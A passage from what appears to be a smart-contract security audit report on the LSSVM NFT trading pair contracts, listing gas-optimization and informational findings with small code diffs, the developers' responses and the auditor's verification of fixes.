SpotPriceUpdate(newSpotPrice); - + + + } } else { revert(CustomError); } Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. 39 +5.4.11 Loop counters are not gas optimized in some places Severity: Gas Optimization MerklePropertyChecker.sol#L22, Context: LSSVMRouter2.sol#L96, RoyaltyEngine.sol#L321, VeryFastRouter.sol#L91, VeryFastRouter.sol#L106, VeryFastRouter.sol#L151, VeryFastRouter.sol#L312. RangePropertyChecker.sol#L28, RoyaltyEngine.sol#L180, VeryFastRouter.sol#L69, RoyaltyEngine.sol#L81, VeryFastRouter.sol#L61, LSSVMRouter2.sol#L88, RoyaltyEngine.sol#L268, VeryFastRouter.sol#L83, Description: Loop counters are optimized in many parts of the code by using an unchecked {++i} (unchecked + prefix increment). However, this is not done in some places where it is safe to do so. Recommendation: Use the following style for loop counter increments in all places consistently: for (uint256 i; i < cachedArrayLength;) { ... unchecked { ++i; } } Sudorandom Labs: Solved in PR#68 and PR#93. Spearbit: Verified that this is fixed by PR#68 and PR#93. +5.4.12 Mixed use of custom errors and revert strings is inconsistent and uses extra gas Severity: Gas Optimization Context: LSSVMPairERC1155.sol, LSSVMPairERC721.sol#L149, LSSVMPair.sol, LSSVMPairETH.sol, VeryFas- tRouter.sol#, LSSVMPairERC20.sol, LSSVMPairFactory.sol, LSSVMRouter.sol, LSSVMRouter2.sol#L75, Royal- tyEngine.sol Description: In some parts of the code, custom errors are declared and later used (CurveErrorCodes and Own- able Errors), while in other parts, classic revert strings are used in require statements. Instead of using error strings, custom errors can be used, which would reduce deployment and runtime costs. Using only custom errors would improve consistency and gas cost. This would also avoid long revert strings which consume extra gas. Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas. This happens at LSSVMPair.sol#L133, LSSVMPair.sol#L666 and LSSVMPairFactory.sol#L505. Recommendation: Consider using one type of error message consistently, preferably custom errors for gas efficiency and other benefits. Sudorandom Labs: Acknowledged, but no change at this time. Spearbit: Acknowledged. +5.4.13 Array length read in each iteration of the loop wastes gas Severity: Gas Optimization LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairERC721.sol, Context: VeryFastRouter.sol, LSSVMPairERC20.sol, LSSVMPairFactory.sol, LSSVMRouter.sol, LSSVMRouter2.sol, RoyaltyEngine.sol LSSVMPair.sol, Description: If not cached, the Solidity compiler will always read the length of the array from storage during each iteration. For storage array, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory array, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first). Recommendation: Cache the array length outside of the loop and use that variable in the loop. 40 + uint256 _royaltyRecipientsLength = royaltyRecipients.length; - for (uint256 i; i < royaltyRecipients.length;) { + for (uint256 i; i < _royaltyRecipientsLength;) { ... } Sudorandom Labs: Acknowledged, partially addressed in PR#82. The rest would either lead to stack too deep issues or are usually called with 1-3 arguments, so caching will not save too much on gas. Spearbit: Acknowledged. +5.4.14 Not tightly packing struct variables consumes extra storage slots and gas Severity: Gas Optimization Context: VeryFastRouter.sol.sol#L22-L30 Description: Gas efficiency can be achieved by tightly packing structs. Struct variables are stored in 32 bytes each and so you can group smaller types to occupy less storage. Recommendation: Pack bools together so they use less slots. Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. +5.4.15 Variables that are redeclared in each loop iteration can be declared once outside the loop Severity: Gas Optimization Context: VeryFastRouter.sol#L62 Description: price is redefined in each iteration of the loop and right after declaration is set to a new value. for (uint256 i; i < numNFTs; i++) { uint256 price; (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier()); ... } Recommendation: Declaration for price can be moved before the loop for gas optimization. + - uint256 price; for (uint256 i; i < numNFTs; i++) { uint256 price; (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier()); ... } Sudorandom Labs: Acknowledged, no change as this is inteded to be called only by clients. Spearbit: Acknowledged. 41 5.5 Informational +5.5.1 Caller of swapTokenForSpecificNFTs() must be able to receive ETH Severity: Informational Context: LSSVMPairETH.sol#L76-L81 Description: The function _refundTokenToSender() sends ETH back to the caller. If this caller is a contract then it might not be able to receive ETH. If it can't receive ETH then the transaction will revert. function _refundTokenToSender(uint256 inputAmount) internal override { // Give excess ETH back to caller if (msg.value > inputAmount) { payable(msg.sender).safeTransferETH(msg.value - inputAmount); } } Recommendation: Document the requirement that the caller must be able to receive ETH. Sudorandom Labs: Addressed in PR#76. Spearbit: Verified that this is fixed by PR#76. +5.5.2 order.doPropertyCheck could be replaced by the pair's propertyChecker() Severity: Informational Context: VeryFastRouter.sol#L120, VeryFastRouter.sol#L134 Description: The field+check for a separate order.doPropertyCheck in struct SellOrder is unnecessary be- cause this can already be checked via the pair's propertyChecker() without relying on the user to explicitly specify it in their order. Recommendation: Consider removing the field+check for order.doPropertyCheck and replacing it with the pair's propertyChecker() to save a struct field and to avoid relying on the user's input. Sudorandom Labs: Acknowledged, no change for now. The current approach is intended to save a bit on gas (no need to call the propertyChecker()), and the risk is bounded (the transaction just reverts). Spearbit: Acknowledged. +5.5.3 _payProtocolFeeFromPair() could be replaced with _sendTokenOutput() Severity: Informational Context: LSSVMPairERC20.sol#L123-L129, LSSVMPairERC20.sol#L132-L137, LSSVMPairETH.sol#L84-L89, LSSVMPairETH.sol#L92-L97 Description: Both ERC20 and ETH versions of _payProtocolFeeFromPair() and _sendTokenOutput() are iden- tical in their parameters and logic. Recommendation: _payProtocolFeeFromPair() could be replaced with the more generic _sendTokenOutput() for simplicity and readability. Sudorandom Labs: Solved in PR#50. Spearbit: Verified that this is fixed by PR#50. 42 +5.5.4 False positive in test_getSellInfoWithoutFee() when delta == FixedPointMathLib.WAD due to wrong implementation Severity: Informational Context: ExponentialCurve.t.sol#L92, ExponentialCurve.sol#L181 Description: In test_getSellInfoWithoutFee, delta is not validated via validateDelta, which causes a false positive in the current test when delta == FixedPointMathLib.WAD. This can be tried with the following proof of concept // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import {FixedPointMathLib} from ,! "https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/FixedPointMathLib.sol"; contract test{ using FixedPointMathLib for uint256; constructor() { uint256 delta = FixedPointMathLib.WAD; uint256 invDelta = FixedPointMathLib.WAD.divWadDown(delta); uint outputValue = delta.divWadDown(FixedPointMathLib.WAD - invDelta); // revert } } Recommendation: Consider the following change within the test - if (delta < FixedPointMathLib.WAD || spotPrice < MIN_PRICE || numItems == 0) { + if (delta <= FixedPointMathLib.WAD || spotPrice < MIN_PRICE || numItems == 0) { return; } Sudorandom Labs: Solved in PR#48. Spearbit: Verified that this is fixed by PR#48. +5.5.5 Checks-Effects-Interactions pattern not used in swapNFTsForToken() Severity: Informational Context: LSSVMPairERC1155.sol#L181, LSSVMPairERC721.sol#L179 Description: It is a defensive programming pattern to first take NFTs and then send the tokens (i.e. the Checks- Effects-Interactions pattern). function swapNFTsForToken(...) ... { ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... } Recommendation: In both versions of swapNFTsForToken() change the order in the following way: 43 function swapNFTsForToken(...) ... { ... _takeNFTsFromSender(...); + ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... - } Sudorandom Labs: Addressed in PR#73. Spearbit: Verified that this is fixed by PR#73. +5.5.6 Two versions of withdrawERC721() and withdrawERC1155() Severity: Informational Context: LSSVMPairERC721.sol#L272-L299, LSSVMPairERC1155.sol#L257-L301 Both the contracts LSSVMPairERC721 and LSSVMPairERC1155 contain the functions Description: withdrawERC721() and withdrawERC1155() with slightly different implementations. This is more difficult to maintain. Recommendation: Consider integrating the different versions of the functions withdrawERC721() and withdraw- ERC1155() and move them to a library. Note: moving the functions to LSSVMPair doesn't work due to multiple inheritance issues. Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. +5.5.7 Missing sanity/threshold checks may cause undesirable behavior and/or waste of gas Severity: Informational Context: LSSVMPairERC1155.sol#L49-53 Description: Numerical user inputs and external call returns that are subject to thresholds due to the contract's logic should be checked for sanity to avoid undesirable behavior or reverts in later logic and wasting unnecessary gas in the process. Recommendation: Consider adding require(numNFTs <= _nft.balanceOf(address(this), nftId()), "Ask for <= balanceOf NFTs") Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. 44 +5.5.8 Deviation from standard/uniform naming convention affects readability Severity: Informational LSSVMPairFactory.sol#L471, LSSVMRouter.sol#L128-L135, Context: LSSVMRouter.sol#L145-L152, LSSVMPairERC721.sol#L71-L83, LSSVMPairERC721.sol#L99-L115, PropertyCheckerFactory.sol#L32-L41, RangePropertyChecker.sol#L7-L36, LSSVMPairFactory.sol#L67, LSSVMPairERC1155.sol#86, LSSVMPairERC1155.sol#L212 LSSVMPairERC20.sol#L34-L115, LSSVMRouter.sol#L69-L75, Description: Following standard/uniform naming conventions are essential to make a codebase easy to read and understand. Recommendation: Here are some suggestions that would improve the codebase readability and quality: • LSSVMRouter.sol#L69-L75, LSSVMRouter.sol#L145-L152, LSSVMPairERC721.sol#L71-L83, LSSVMPairERC721.sol#L99-L115: for consistency/clarity, assign to the named return variable instead of an explicit return. LSSVMRouter.sol#L128-L135, • MerklePropertyChecker.sol#L18-L28 and RangePropertyChecker.sol#L24-L35: for consistency/clarity, as- sign to the named return variable instead of an explicit return. • LSSVMPair.sol#L315-L328: for consistency/clarity, assign to the named return variable instead of an explicit return. • LSSVMPairFactory.sol#L471: the function could be named more specifically (e.g. getSettingsRoyaltyFor- Pair) because this is specifically returning the royalty aspect of setting benefits and not setting requirements of upfront-fee, fee-splits and lockup duration. • LSSVMPairERC20.sol#L34-L115: the function could be named more specifically as it also pulls royalties. • PropertyCheckerFactory.sol#L32-L41: the function arguments lowerBound/upperBound could be renamed to start/end. • RangePropertyChecker.sol#L7-L36: variables and function names referencing lowerBound/upperBound could be accordingly renamed so that they reference start/end. • LSSVMPairFactory.sol#L67: the field wasEverAllowed of struct RouterStatus could be named more specif- ically (e.g. wasEverTouched). The current name can be confusing because the RouterStatus struct can be declared with isAllowed == False. • LSSVMPairERC1155.sol#86: the function swapTokenForAnyNFTs() should be renamed to swapTokenFor- SpecificNFTs() for consistency with its ERC721 counterpart. • LSSVMPairERC1155.sol#L212: the function _sendAnyNFTsToRecipient() should be renamed to _send- SpecificNFTsToRecipient() for consistency with its ERC721 counterpart. Sudorandom Labs: One suggestion addressed in PR#82, rest acked. Spearbit: Verified that wasEverAllowed is replaced with wasEverTouched. Rest is acknowledged. +5.5.9 Function _getRoyaltyAndSpec() contains code duplication which affects maintainability Severity: Informational Context: RoyaltyEngine.sol#L132-L313 Description: The function _getRoyaltyAndSpec() is rather long and contains code duplication. This makes it difficult to maintain. 45 function _getRoyaltyAndSpec(address tokenAddress, uint256 tokenId, uint256 value) ... if (spec <= NOT_CONFIGURED && spec > NONE) { try IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId) returns (...) { // Support Art Blocks override require(recipients_.length == bps.length); return (recipients_, _computeAmounts(value, bps), ARTBLOCKS, royaltyAddress, addToCache); } catch {} ... } else { // Spec exists, just execute the appropriate one ... ... if (spec == ARTBLOCKS) { // Art Blocks spec uint256[] memory bps; (recipients, bps) = IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId); require(recipients.length == bps.length); return (recipients, _computeAmounts(value, bps), spec, royaltyAddress, addToCache); } else ... } Recommendation: Consider splitting up the _getRoyaltyAndSpec() in smaller pieces where similar code is combined in one smaller function. The use of function pointers might be helpful here. Sudorandom Labs: Acknowledged, no change. The decision here is to align more closely with the original Manifold code. Spearbit: Acknowledged. +5.5.10 getSellInfo always adds 1 rather than rounding which leads to last item being sold at 0 Severity: Informational Context: LinearCurve.sol.sol#L130 Description: Based on the comment // We calculate how many items we can sell into the linear curve until the spot price reaches 0, rounding up. In cases where delta == spotPrice && numItems > 1, the last item would be sold at 0: delta = 100; spotPrice = 100; numItems = 2; uint256 totalPriceDecrease = delta * numItems = 200; Therefore succeeds at: if (spotPrice < totalPriceDecrease) Later calculated: uint256 numItemsTillZeroPrice = spotPrice / delta + 1; That would result in 2, while the division was an exact 1, therefore is not rounded up in case where spotPrice == delta but increased always by 1. Recommendation: Correct the difference between the comment and the implemented logic. Sudorandom Labs: Yes the comment is inaccurate like you said. The logic is still correct though, in the PoC the first item is sold for 100, the second is sold for 0, and outputValue = numItems * spotPrice - (numItems * (numItems - 1) * delta) / 2; equals 100 which is correct. Spearbit: Acknowledged. 46 +5.5.11 Natspec for robustSwapETHForSpecificNFTs() is slightly misleading Severity: Informational Context: LSSVMRouter.sol#L193 Description: The function robustSwapETHForSpecificNFTs() has this comment: * @dev We assume msg.value >= sum of values in maxCostPerPair This doesn't have to be the case. The transaction just reverts if msg.value isn't sufficient. Recommendation: Consider changing the comment to something like: * @dev Supply msg.value >= sum of values in maxCostPerPair to make sure the transaction doesn't revert Sudorandom Labs: Solved in PR#92 . Spearbit: Verified that this is fixed by PR#92 . +5.5.12 Two copies of pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From() are present Severity: Informational Context: LSSVMRouter.sol#L491-L543, VeryFastRouter.sol#L344-L407 Description: Both contracts LSSVMRouter and VeryFastRouter contain the functions pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From(). This is more difficult to maintain as both copies have to stay in synch. Recommendation: Consider using only one copy of the functions. This can be done via a library or a template from which both contracts inherit. Sudorandom Labs: We are going to be deprecating LSSVMRouter in favor of VeryFastRouter. Yes, I agree a library would eventually be useful for e.g. making other routers. I'm classifying it as out of scope for now (but something to revisit in the future) as the VeryFastRouter is intended to be the primary router moving forward. Spearbit: Acknowledged. +5.5.13 Not using error strings in require statements obfuscates monitoring Severity: Informational Context: LSSVMPairETH.sol#L139, RoyaltyEngine.sol#L53, RoyaltyEngine.sol#L165, RoyaltyEngine.sol#L172, RoyaltyEngine.sol#L229, RoyaltyEngine.sol#L192, RoyaltyEngine.sol#L253, RoyaltyEngine.sol#L286, RoyaltyEngine.sol#L304. RoyaltyEngine.sol#L222, RoyaltyEngine.sol#L280, RoyaltyEngine.sol#L215, RoyaltyEngine.sol#L259, Description: require statements should include meaningful error messages to help with monitoring the system. Recommendation: Consider adding a descriptive reason in an error string / custom error. Sudorandom Labs: Acknowledged, no change. Spearbit: Acknowledged. 47 +5.5.14 prices and balances in the curves may not be updated after calls to depositNFTs() and depositERC20() Severity: Informational Context: LSSVMPairFactory.sol#L650-L676 Description: The functions depositNFTs() and depositERC20() allow anyone to add NFTs and/or ERC20 to a pair but do not update the prices and balances in the curves. And if they were to do so, then the functions might be abused to update token prices with irrelevant tokens and NFTs. However, it is not clear if/how the prices and balances in the curves are updated to reflect this. The owner can't fully rely on emits. Recommendation: Consider making the functions onlyOwner for the pair owner. Sudorandom Labs: The only curve at the moment which cares about balances is the XYK curve which uses virtual balances (and doesn't read from state). So anyone depositing into a pool wouldn't affect pricing. Adding onlyOwner wouldnt' stop e.g. people from directly calling transferFrom anyway. The intended steps for pool owners who want to modify their pool pricing for an XYK curve with respect to additional funds deposited is to either modify the price first, then deposit funds, or deposit funds first, then modify the price. In general, as depositing funds is going to increase the reserves (and thus decrease the slippage), the recommended procedure would be to deposit additional funds first, then update the virtual reserves. Spearbit: Acknowledged. +5.5.15 Functions enableSettingsForPair() and disableSettingsForPair() can be simplified Severity: Informational Context: LSSVMPairFactory.sol#L501-L524 Description: The functions enableSettingsForPair() and disableSettingsForPair() define a temporary vari- able pair. This could also be used earlier in the code to simplify the code. function enableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address"); LSSVMPair pair = LSSVMPair(pairAddress); ... } function disableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address"); ... LSSVMPair pair = LSSVMPair(pairAddress); ... } Recommendation: Consider changing the code to: + - + - LSSVMPair pair = LSSVMPair(pairAddress); require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address"); require(isPair(pairAddress, pair.pairVariant()), "Invalid pair address"); ... LSSVMPair pair = LSSVMPair(pairAddress); Sudorandom Labs: This is no longer an issue because we refactored isPair to take in an address now. Spearbit: Verified. Now isValidPair() checks whether the address provided is a valid pair without the need of casting the address to a LSSVMPair, unlike what isPair() needed. 48 +5.5.16 Design asymmetry decreases code readability Severity: Informational Context: LSSVMPair.sol#L1 Description: The function _calculateBuyInfoAndUpdatePoolParams() performs a check on maxExpectedToken- Input inside its function. On the other hand, the comparable check for _calculateSellInfoAndUpdatePoolParams() is done outside of the function: function _swapNFTsForToken(...) ... { // LSSVMPairERC721.sol ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(...) require(outputAmount >= minExpectedTokenOutput, "Out too few tokens"); ... } The asymmetry in the design of these functions affects code readability and may confuse the reader. Recommendation: Implementing the aforementioned checks in a more symmetric manner yields a cleaner code. Sudorandom Labs: Solved in PR#76. Spearbit: Verified that this is fixed by PR#76. +5.5.17 Providing the same _nftID multiple times will increase numPairNFTsWithdrawn multiple times to potentially cause confusion Severity: Informational Context: LSSVMPairERC1155.sol#L285 Description: If one accidentally (or intentionally) supplies the same id == _nftID multiple times in the array ids[], then numPairNFTsWithdrawn is increased multiple times. Assuming this value is used via indexing for the user interface, this could be misleading. Recommendation: Potential solution is to add a break once an occurrence of _nftId has been found. This also saves some gas. for (uint256 i; i < numNFTs;) { if (ids[i] == _nftId) { numPairNFTsWithdrawn += amounts[i]; break; } unchecked { ++i; } + } if (numPairNFTsWithdrawn != 0) { // only emit for the pair's NFT emit NFTWithdrawal(numPairNFTsWithdrawn); } Sudorandom Labs: This does change the behavior of the function - in theory a user could pass in ids [1, 1, 1] and amounts [10, 20, 30] and we'd expect the batchTransfer to transfer 60 tokens. We're ok skipping over this change. Spearbit: Acknowledged. 49 +5.5.18 Dual interface NFTs may cause unexpected behavior if not considered in future Severity: Informational Context: LSSVMPairCloner.sol#L90-L94, LSSVMPairCloner.sol#L341-L345 Description: Some NFTs support both the ERC721 and the ERC1155 standard. For example NFTs of the Sandbox project. Additionally, the internal layout of the parameters of cloneETHPair and cloneERC1155ETHPair are very similar: | cloneETHPair | cloneERC1155ETHPair | | --- | --- | | mstore(add(ptr, 0x3e), shl(0x60, factory)) | mstore(add(ptr, 0x3e), shl(0x60, factory)) | | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | | mstore(add(ptr, 0x66), shl(0x60, nft)) | mstore(add(ptr, 0x66), shl(0x60, nft)) | | mstore8(add(ptr, 0x7a), poolType) | mstore8(add(ptr, 0x7a), poolType) | | mstore(add(ptr, 0x7b), shl(0x60, propertyChecker)) | mstore(add(ptr, 0x7b), nftId) | In case there is a specific function that only works on ERC721, and that can be applied to ERC1155 pairs, in combination with an NFT that supports both standards, then an unexpected situation could occur. Currently, this is not the case, but that might occur in future iterations of the code. Recommendation: Be aware of the risk while maintaining the code. If necessary the type of NFT can be retrieved via supportInterface(). By checking for both NFT types, the NFT supporting both standards can be detected. Sudorandom Labs: Acknowledged. Spearbit: Acknowledged. +5.5.19 Missing event emission in multicall Severity: Informational Context: LSSVMPair.sol#L653-L663 Description: Not emitting events on success/failure of calls within a multicall makes debugging failed multicalls difficult. There are several actions that should always emit events for transparency such as ownership change, transfer of ether/tokens etc. In the case of a multicall function, it is recommended to emit an event for succeeding (or failing) calls. Recommendation: Consider emitting an event after each succeeding/failing call of multicall. Sudorandom Labs: Acknowledged, no change at this time. Spearbit: Acknowledged. +5.5.20 Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuote- WithRoyalties() could be misleading Severity: Informational Context: LSSVMPair.sol#L206-L266 Description: The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() re- turn a protocolFee variable. There are also other fees like tradeFee and royaltyTotal that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why other fees are not included here. Recommendation: Double-check the usefulness of the protocolFee variable. If it is never used it could be removed. If it is used from the outside, then it might be useful to also add tradeFee and royaltyTotal, or return the sum of all fees. Sudorandom Labs: Acknowledged, no change for now. Users can call calculateRoyaltiesView or use the tradeFee to calculate values they need from pairs of interest. Spearbit: Acknowledged. 50 +5.5.21 Two ways to query the assetRecipient could be confusing Severity: Informational Context: LSSVMPair.sol#L77, LSSVMPair.sol#L315-L328 Description: The contract LSSVMPair has two ways to query the assetRecipient. On via the getter assetRecip- ient() and one via getAssetRecipient(). Both give different results and generally getAssetRecipient() should be used. Having two ways could be confusing. address payable public assetRecipient; function getAssetRecipient() public view returns (address payable _assetRecipient) { ... // logic to determine _assetRecipient } Recommendation: Change the variable assetRecipient to internal. This way no getter function is generated. Sudorandom Labs: Solved in PR#62 and PR#84. Spearbit: Verified that this is fixed by PR#62 and PR#84. +5.5.22 Functions expecting NFT deposits can validate parameters for sanity and optimization Severity: Informational Context: LSSVMPairFactory.sol#L603-L621, LSSVMPairFactory.sol#L623-L645 Description: Functions expecting NFT deposits in their typical flows can validate parameters for sanity and opti- mization. Recommendation: Add _initialNFTBalance != 0 to prevent empty transfers in _nft.safeTransferFrom() Sudorandom Labs: Solved in PR#49. Spearbit: Verified that this is fixed in PR#49. +5.5.23 Functions expecting ETH deposits can check msg.value for sanity and optimization Severity: Informational Context: LSSVMPairFactory.sol#L547-L571, LSSVMPairFactory.sol#L603-L621 Description: Functions that expect ETH deposits in their typical flows can check for non-zero values of msg.value for sanity and optimization. Recommendation: Add msg.value > 0 checks. Sudorandom Labs: Solved in PR#79. Spearbit: Verified that this is fixed by PR#79. 51 +5.5.24 LSSVMPairs can be simplified Severity: Informational Context: ERC721ERC20.sol#L18, LSSVMPairERC721ETH.sol#L18 LSSVMPairERC1155ERC20.sol#L19, LSSVMPairERC1155ETH.sol#L18, LSSVMPair- Description: At the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVM- Pair, which could store them as immutable. Then functions pairVariant() and _immutableParamsLength() can also be moved to LSSVMPair, which would simplify the code. Recommendation: Consider passing the values to LSSVMPair in the constructor and move the functions pair- Variant() and _immutableParamsLength() to LSSVMPair. For example, at LSSVMPairERC1155ERC20.sol#L19: - constructor(IRoyaltyEngineV1 royaltyEngine) LSSVMPair(royaltyEngine) {} + constructor(IRoyaltyEngineV1 royaltyEngine) ,! LSSVMPair(ILSSVMPairFactoryLike.PairVariant.ERC1155_ERC20, 133, royaltyEngine) {} Sudorandom Labs: Good suggestion. Acknowledged, no change for now. Spearbit: Acknowledged. +5.5.25 Unused values in catch can be avoided for better readability Severity: Informational Context: StandardSettings.sol#L137 Description: Employing a catch clause with higher verbosity may reduce readability. Solidity supports different kinds of catch blocks depending on the type of error. However, if the error data is of no interest, one can use a simple catch statement without error data. Recommendation: Consider removing the arguments between the catch statement for clarity. See below try pairFactory.enableSettingsForPair(address(this), msg.sender) {} - catch(bytes memory ) { + catch { revert("Pair verification failed"); } Sudorandom Labs: Solved in PR#72. Spearbit: Verified that this is solved by PR#72. +5.5.26 Stale constant and comments reduce readability Severity: Informational Context: RoyaltyEngine.sol#L35, RoyaltyEngine.sol#L146 Description: After some updates, the logic was added ~2 years ago when enum was changed to int16. Based on the comments and given that was upgradeable, it was expected that one could add new unconfigured specs with negative IDs between NONE (by decrementing it) and NOT_CONFIGURED. In this non-upgradeable fork, the current constants treat only the spec ID of 0 as NOT_CONFIGURED. // Anything > NONE and <= NOT_CONFIGURED is considered not configured int16 private constant NONE = -1; int16 private constant NOT_CONFIGURED = 0; Recommendation: Logic and comments that considers value > NONE && value <= NOT_CONFIGURED can be refactored into value <= NOT_CONFIGURED Sudorandom Labs: Solved in PR#72. 52 Spearbit: Verified that this is fixed by PR#72. +5.5.27 Different MAX_FEE value and comments in different places is misleading Severity: Informational Context: LSSVMPairFactory.sol#L46, LSSVMPair.sol#L46-L47 Description: The same MAX_FEE constant is declared in different files with different values, while comments indi- cate that these values should be the same. // 50%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 0.5e18; uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must <= 1 - MAX_FEE` Recommendation: Fix the inconsistency between comment/values in the two files. Sudorandom Labs: Solved in PR#79 and PR#92. Spearbit: Verified that this is fixed by PR#79 and PR#92. +5.5.28 Events without indexed event parameters make it harder/inefficient for off-chain tools Severity: Informational PropertyCheckerFactory.sol#L11, LSSVMPair.sol#L83, Context: LSSVMPair.sol#L84, LSSVMPair.sol#L85, LSSVMPair.sol#L86, LSSVMPair.sol#L87, LSSVMPair.sol#L88, LSSVMPair.sol#L89, LSSVMPair.sol#L90, LSSVMPair.sol#L91, LSSVMPair.sol#L92, LSSVMPair.sol#L93, LSSVMPairFactory.sol#L74, LSSVMPair.sol#L94, LSSVMPairFac- LSSVMPairFactory.sol#L75, tory.sol#L78, LSSVMPairFactory.sol#L79, LSSVMPairFactory.sol#L80 PropertyCheckerFactory.sol#L12, LSSVMPairFactory.sol#L77, LSSVMPairFactory.sol#L73, LSSVMPairFactory.sol#L72, LSSVMPairFactory.sol#L76, Description: Indexed event fields make them quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission; so it's not necessarily best to index the maximum allowed per event (three fields). Recommendation: Consider which event parameters could be particularly useful for off-chain tools and index them. Sudorandom Labs: Solved in PR#74. Spearbit: Verified that this is fixed by PR#74. +5.5.29 Some functions included in LSSVMPair are not found in ILSSVMPair.sol and ILSSVMPairFactory- Like.sol Severity: Informational Context: ILSSVMPair.sol#L10 Description: LSSVMPair contract defines the following functions which are missing from interface ILSSVMPair: 53 ROYALTY_ENGINE() spotPrice() delta() assetRecipient() pairVariant() factory() swapNFTsForToken() (2 versions) swapTokenForSpecificNFTs() getSellNFTQuoteWithRoyalties() call() withdrawERC1155() Recommendation: Consider including the above functions in interface ILSSVMPair so that other contracts can import the interface and use them. Sudorandom Labs: Acknowledged. Spearbit: Acknowledged. +5.5.30 Absent/Incomplete Natspec affects readability and maintenance Severity: Informational IOwnershipTransferReceiver.sol#L6, OwnableWithTransferCallback.sol#L39-L42, RangeProp- Context: IProperty- ertyChecker.sol#L24, Checker.sol#L18, LSSVMPairERC1155.sol#L216-L221, VeryFastRouter.sol#L53-L55, VeryFastRouter.sol#L75- L77, LSSVMRouter.sol#L400-L409, LSSVMPair.sol#L202-L205, LSSVMPair.sol#L221-L224, LSSVMPair.sol#L240-L243, LSSVMPair.sol#L268-L270 MerklePropertyChecker.sol#L11-L13, MerklePropertyChecker.sol#L18, VeryFastRouter.sol#L220-L227, LSSVMRouter.sol#L317-L326, Description: Comments are key to understanding the codebase logic. In particular, Natspec comments provide rich documentation for functions, return variables and more. This documentation aids users, developers and auditors in understanding what the functions within the contract are meant to do. However, some functions within the codebase contain issues with respect to their comments with either no Natspec or incomplete Natspec annotations, leading to partial descriptions of the functions. Recommendation: Add and fix comments where needed. For Natspec comments, include the missing parame- ters, returns and descriptions where needed. • Missing Natspec: – IOwnershipTransferReceiver.sol#L6 – RangePropertyChecker.sol#L24 – MerklePropertyChecker.sol#L18 – IPropertyChecker.sol#L18 • Incomplete Natspec: – OwnableWithTransferCallback.sol#L39-L42: annotations missing for newOwner and data. – MerklePropertyChecker.sol#L11-L13: wrong description for return. – LSSVMPairERC1155.sol#L216-L221: annotations missing for isRouter and routerCaller. – VeryFastRouter.sol#L53-L55: although it can be inferred from the comment, there are missing annota- tions for pair, numNFTs and the return. – VeryFastRouter.sol#L75-L77: natspec is incorrect (copy-paste from another function). – VeryFastRouter.sol#L220-L227: annotations missing for protocolFeeMultiplier and return values. – LSSVMRouter.sol#L317-L326: annotations missing for return values. 54 – LSSVMRouter.sol#L400-L409: annotations missing for return values. – LSSVMPair.sol#L202-L205: annotations missing for return values. – LSSVMPair.sol#L221-L224: annotations missing for return values. – LSSVMPair.sol#L240-L243: annotations missing for assetId and return values. – LSSVMPair.sol#L268-L270: annotations missing for return values. – LSSVMPairERC721.sol#L220 annotations missing for _factory value. • Unclear comment – LSSVMPairCloner.sol#L51 not clear if the value it's hexadecimal or decimal. • Incorrect comment – LSSVMPairCloner.sol#L299 should be EXTRA DATA (93 bytes). – LSSVMPairCloner.sol#L386 should be EXTRA DATA (113 bytes). – StandardSettings.sol#L257 should say "sell to pair". – LSSVMPairERC721.sol#L94 should say "ERC721 tokens will be transfered" rather than "ERC20 tokens will be transferred". – LSSVMPairERC721.sol#L268 should be onlyOwner not onlyOwnable. – StandardSettings.sol#L257 should say "sell to pair". – LSSVMPairERC721.sol#L94 it says "ERC20 tokens will be transfered", should be "ERC721 tokens will be transferred". – LSSVMPairERC721.sol#L268, LSSVMPair.sol#L559, LSSVMPair.sol#L566 should be onlyOwner not onlyOwnable. – LSSVMRouter.sol#L61-L68 The Unix timestamp (in seconds) at/after which the swap will revert should be replaced by The Unix timestamp (in seconds) after which the swap will revert. • Missing comment – cloneERC1155ETHPair, cloneERC1155ERC20Pair are missing Total length comment like the ones found at cloneETHPair() and cloneERC20Pair(), cloneERC1155ERC20Pair. – ExponentialCurve.sol#L24 Other contract have a comment about the unused variable name. For ex- ample: function validateSpotPrice(uint128 /*newSpotPrice*/ ) external pure override re- turns (bool) {. • Misplaced comment – ReentrancyGuard.sol#L3, 